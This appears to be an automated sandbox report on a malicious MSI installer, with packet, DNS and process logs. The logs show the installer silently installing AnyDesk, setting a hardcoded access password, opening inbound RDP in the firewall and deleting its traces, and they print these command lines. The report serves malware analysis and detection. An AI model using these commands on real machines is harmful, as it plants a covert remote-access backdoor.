                                                                              Data Raw:91 00 e3 00 e5 00 e6 00 f0 00 f1 00 f3 00 f5 00 f7 00 f9 00 fb 00 fd 00 ff 00 01 01 03 01 10 01 11 01 13 01 15 01 17 01 1a 01 2c 01 2f 01 e4 00 e4 00 e4 00 ee 00 02 01 f4 00 f6 00 f8 00 fa 00 fc 00 fe 00 00 01 02 01 02 01 2e 01 12 01 14 01 16 01 2d 01 1b 01 e4 00
                                                                              Stream Path: \x18496\x17932\x17910\x17458\x16778\x17207\x17522, File Type: data, Stream Size: 180
                                                                              General
                                                                              Stream Path:\x18496\x17932\x17910\x17458\x16778\x17207\x17522
                                                                              File Type:data
                                                                              Stream Size:180
                                                                              Entropy:2.754589929626484
                                                                              Base64 Encoded:False
                                                                              Data ASCII:. . . . . . . . . . . . . . . . 3 . . 3 . 3 . . . 3 . 3 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                              Data Raw:ae 00 b0 00 b1 00 b4 00 b6 00 b7 00 b9 00 ba 00 bb 00 bd 00 bf 00 c0 00 c2 00 c3 00 c5 00 01 80 33 80 01 80 01 80 33 80 01 8c 33 80 01 8c 01 80 01 80 33 80 01 8c 33 80 01 8c 01 80 a9 00 b1 00 a9 00 a9 00 b7 00 a9 00 ba 00 a9 00 a9 00 a9 00 c0 00 a9 00 c3 00 a9 00 a9 00 af 00 b2 00 b3 00 b5 00 b2 00 b8 00 b2 00 b3 00 bc 00 be 00 b2 00 c1 00 b2 00 c4 00 c6 00 00 00 00 00 00 00 00 00

                                                                              Network Behavior

                                                                              Network Port Distribution

                                                                              TCP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Aug 5, 2022 18:23:17.955034971 CEST49175443192.168.2.22195.181.174.167
                                                                              Aug 5, 2022 18:23:17.955077887 CEST44349175195.181.174.167192.168.2.22
                                                                              Aug 5, 2022 18:23:17.955163002 CEST49175443192.168.2.22195.181.174.167
                                                                              Aug 5, 2022 18:23:17.956656933 CEST49175443192.168.2.22195.181.174.167
                                                                              Aug 5, 2022 18:23:17.956707001 CEST44349175195.181.174.167192.168.2.22
                                                                              Aug 5, 2022 18:23:17.956804037 CEST49175443192.168.2.22195.181.174.167
                                                                              Aug 5, 2022 18:23:18.078598976 CEST4917680192.168.2.2292.223.88.41
                                                                              Aug 5, 2022 18:23:18.109005928 CEST804917692.223.88.41192.168.2.22
                                                                              Aug 5, 2022 18:23:18.109520912 CEST4917680192.168.2.2292.223.88.41
                                                                              Aug 5, 2022 18:23:18.117553949 CEST491776568192.168.2.22195.181.174.174
                                                                              Aug 5, 2022 18:23:18.136924982 CEST656849177195.181.174.174192.168.2.22
                                                                              Aug 5, 2022 18:23:18.137054920 CEST491776568192.168.2.22195.181.174.174
                                                                              Aug 5, 2022 18:23:18.137501955 CEST491776568192.168.2.22195.181.174.174
                                                                              Aug 5, 2022 18:23:18.158116102 CEST656849177195.181.174.174192.168.2.22
                                                                              Aug 5, 2022 18:23:18.158333063 CEST491776568192.168.2.22195.181.174.174
                                                                              Aug 5, 2022 18:23:45.921768904 CEST4917820000192.168.2.2280.209.241.3
                                                                              Aug 5, 2022 18:23:46.016635895 CEST200004917880.209.241.3192.168.2.22
                                                                              Aug 5, 2022 18:23:46.019696951 CEST4917820000192.168.2.2280.209.241.3
                                                                              Aug 5, 2022 18:23:46.019758940 CEST4917820000192.168.2.2280.209.241.3
                                                                              Aug 5, 2022 18:23:46.153834105 CEST200004917880.209.241.3192.168.2.22
                                                                              Aug 5, 2022 18:23:46.159286976 CEST4917820000192.168.2.2280.209.241.3
                                                                              Aug 5, 2022 18:23:46.294455051 CEST200004917880.209.241.3192.168.2.22
                                                                              Aug 5, 2022 18:23:46.294933081 CEST200004917880.209.241.3192.168.2.22
                                                                              Aug 5, 2022 18:23:46.295002937 CEST200004917880.209.241.3192.168.2.22
                                                                              Aug 5, 2022 18:23:46.299264908 CEST4917820000192.168.2.2280.209.241.3
                                                                              Aug 5, 2022 18:23:47.520963907 CEST4917820000192.168.2.2280.209.241.3
                                                                              Aug 5, 2022 18:23:47.615866899 CEST200004917880.209.241.3192.168.2.22

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Aug 5, 2022 18:23:17.905138016 CEST5586853192.168.2.228.8.8.8
                                                                              Aug 5, 2022 18:23:17.924896002 CEST53558688.8.8.8192.168.2.22
                                                                              Aug 5, 2022 18:23:17.925493956 CEST5586853192.168.2.228.8.8.8
                                                                              Aug 5, 2022 18:23:17.944211960 CEST53558688.8.8.8192.168.2.22
                                                                              Aug 5, 2022 18:23:18.053093910 CEST4968853192.168.2.228.8.8.8
                                                                              Aug 5, 2022 18:23:18.075155973 CEST53496888.8.8.8192.168.2.22
                                                                              Aug 5, 2022 18:23:18.088778019 CEST5883653192.168.2.228.8.8.8
                                                                              Aug 5, 2022 18:23:18.109394073 CEST53588368.8.8.8192.168.2.22

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Aug 5, 2022 18:23:17.905138016 CEST192.168.2.228.8.8.80x8710Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                              Aug 5, 2022 18:23:17.925493956 CEST192.168.2.228.8.8.80x8710Standard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                              Aug 5, 2022 18:23:18.053093910 CEST192.168.2.228.8.8.80xcfcaStandard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)
                                                                              Aug 5, 2022 18:23:18.088778019 CEST192.168.2.228.8.8.80x5d9dStandard query (0)boot.net.anydesk.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Aug 5, 2022 18:23:17.924896002 CEST8.8.8.8192.168.2.220x8710No error (0)boot.net.anydesk.com92.223.88.41A (IP address)IN (0x0001)
                                                                              Aug 5, 2022 18:23:17.944211960 CEST8.8.8.8192.168.2.220x8710No error (0)boot.net.anydesk.com195.181.174.167A (IP address)IN (0x0001)
                                                                              Aug 5, 2022 18:23:18.075155973 CEST8.8.8.8192.168.2.220xcfcaNo error (0)boot.net.anydesk.com92.223.88.41A (IP address)IN (0x0001)
                                                                              Aug 5, 2022 18:23:18.109394073 CEST8.8.8.8192.168.2.220x5d9dNo error (0)boot.net.anydesk.com195.181.174.174A (IP address)IN (0x0001)

                                                                              Statistics

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:1
                                                                              Start time:18:22:14
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\1.msi"
                                                                              Imagebase:0xff1c0000
                                                                              File size:128512 bytes
                                                                              MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:2
                                                                              Start time:18:22:15
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\msiexec.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\msiexec.exe /V
                                                                              Imagebase:0xff1c0000
                                                                              File size:128512 bytes
                                                                              MD5 hash:AC2E7152124CEED36846BD1B6592A00F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:3
                                                                              Start time:18:22:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\VSSVC.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\vssvc.exe
                                                                              Imagebase:0xff910000
                                                                              File size:1600512 bytes
                                                                              MD5 hash:B60BA0BC31B0CB414593E169F6F21CC2
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:4
                                                                              Start time:18:22:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k swprv
                                                                              Imagebase:0xff7d0000
                                                                              File size:27136 bytes
                                                                              MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:5
                                                                              Start time:18:22:57
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 6381DE7DB6BAADD41D0E24C26E59EDFC
                                                                              Imagebase:0xd00000
                                                                              File size:73216 bytes
                                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:6
                                                                              Start time:18:23:03
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\msiexec.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 22388C515E15FC158EA4B11229C0F8D9 E Global\MSI0000
                                                                              Imagebase:0xd00000
                                                                              File size:73216 bytes
                                                                              MD5 hash:4315D6ECAE85024A0567DF2CB253B7B0
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:7
                                                                              Start time:18:23:04
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
                                                                              Imagebase:0x5b0000
                                                                              File size:27136 bytes
                                                                              MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:9
                                                                              Start time:18:23:06
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\expand.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
                                                                              Imagebase:0xf70000
                                                                              File size:53248 bytes
                                                                              MD5 hash:659CED6D7BDA047BCC6048384231DB9F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:11
                                                                              Start time:18:23:11
                                                                              Start date:05/08/2022
                                                                              Path:C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe"
                                                                              Imagebase:0x400000
                                                                              File size:3837440 bytes
                                                                              MD5 hash:8C42AB81F90EE0592F7A709F0F7E320B
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low

                                                                              General

                                                                              Target ID:12
                                                                              Start time:18:23:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
                                                                              Imagebase:0x4a350000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              General

                                                                              Target ID:13
                                                                              Start time:18:23:16
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\rdpdr.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:165888 bytes
                                                                              MD5 hash:1B6163C503398B23FF8B939C67747683
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:moderate

                                                                              General

                                                                              Target ID:15
                                                                              Start time:18:23:17
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\tdtcp.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:23552 bytes
                                                                              MD5 hash:51C5ECEB1CDEE2468A1748BE550CFBC8
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:16
                                                                              Start time:18:23:18
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:c:\programdata\anydesk.exe --install C:\ProgramData\AnyDesk --silent
                                                                              Imagebase:0x1040000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:17
                                                                              Start time:18:23:18
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\tssecsrv.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:39936 bytes
                                                                              MD5 hash:19BEDA57F3E0A06B8D5EB6D619BD5624
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:18
                                                                              Start time:18:23:18
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\System32\drivers\rdpwd.sys
                                                                              Wow64 process (32bit):
                                                                              Commandline:
                                                                              Imagebase:
                                                                              File size:212480 bytes
                                                                              MD5 hash:FE571E088C2D83619D2D48D4E961BF41
                                                                              Has elevated privileges:
                                                                              Has administrator privileges:
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:20
                                                                              Start time:18:23:25
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\ProgramData\AnyDesk\AnyDesk.exe" --service
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 0%, Virustotal, Browse
                                                                              • Detection: 3%, Metadefender, Browse
                                                                              • Detection: 2%, ReversingLabs

                                                                              General

                                                                              Target ID:21
                                                                              Start time:18:23:32
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\ProgramData\AnyDesk\AnyDesk.exe" --control
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:22
                                                                              Start time:18:23:41
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:cmd /c echo 31121985west|c:\programdata\anydesk\anydesk.exe --set-password
                                                                              Imagebase:0x4a0e0000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:24
                                                                              Start time:18:23:42
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo 31121985west"
                                                                              Imagebase:0x4a0e0000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:25
                                                                              Start time:18:23:42
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:c:\programdata\anydesk\anydesk.exe --set-password
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:26
                                                                              Start time:18:23:54
                                                                              Start date:05/08/2022
                                                                              Path:C:\ProgramData\anydesk\AnyDesk.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"c:\programdata\anydesk\anydesk.exe" --get-id
                                                                              Imagebase:0x12a0000
                                                                              File size:3829888 bytes
                                                                              MD5 hash:1BC5890C9E7BF54B7712E344B0AF9D04
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:27
                                                                              Start time:18:23:58
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\netsh.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:netsh advfirewall firewall add rule name="RDP" dir=in protocol=TCP localport=3389 action=allow
                                                                              Imagebase:0x13a0000
                                                                              File size:96256 bytes
                                                                              MD5 hash:784A50A6A09C25F011C3143DDD68E729
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:29
                                                                              Start time:18:24:02
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\icacls.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\." /SETINTEGRITYLEVEL (CI)(OI)LOW
                                                                              Imagebase:0xf00000
                                                                              File size:27136 bytes
                                                                              MD5 hash:1542A92D5C6F7E1E80613F3466C9CE7F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              General

                                                                              Target ID:31
                                                                              Start time:18:24:06
                                                                              Start date:05/08/2022
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\system32\cmd.exe /c rd /s /q "C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files"
                                                                              Imagebase:0x4aab0000
                                                                              File size:302592 bytes
                                                                              MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Disassembly

                                                                              No disassembly